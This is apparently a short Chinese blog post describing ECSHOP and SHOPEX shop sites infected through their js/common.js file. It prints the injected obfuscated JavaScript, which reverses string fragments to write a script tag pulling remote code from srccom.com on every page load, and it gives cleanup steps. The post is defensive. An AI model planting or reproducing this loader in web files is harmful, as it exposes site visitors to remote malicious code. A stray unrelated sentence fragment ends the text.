最近发现一个ECSHOP做的网站,首页以及各个页面打开非常慢。。。经检查发现每次打开页面都在进行长时间的srccom.com 请求,又经百度了一下,大量ECSHOP及SHOPEX网站被挂此马。
其实是 js/common.js 中被植入了一段恶意JS代码:
123456789101112functionCurrentXmlFrmFocus(){vararnElement=[2,9,3,8,2,8,7,5,4,3,10,5];vararsOffset=["",":",".","/","<",">","=","'","CRS","MOC","TPIRCS","PTTH"];varardPopOpacity=[4,10,0,8,6,7,11,1,3,3,8,9];varstrgAttribute="";ardPopOpacity=ardPopOpacity.concat(arnElement);for(vari=0;i<ardPopOpacity.length;i++){strgAttribute=strgAttribute+arsOffset[ardPopOpacity[i]].split("").reverse().join("");}document.writeln(strgAttribute);} CurrentXmlFrmFocus();函数最终会拼接出一段完整的script标签:
1<scriptSRC=’http://srccom.com/SRC.SRC’></script>解决办法:
1、删除 common.js 中的这段代码。
2、使用官方原版的 common.js 文件覆盖空间的 common.js 文件。
而只有在充满了艰辛的人生旅途中,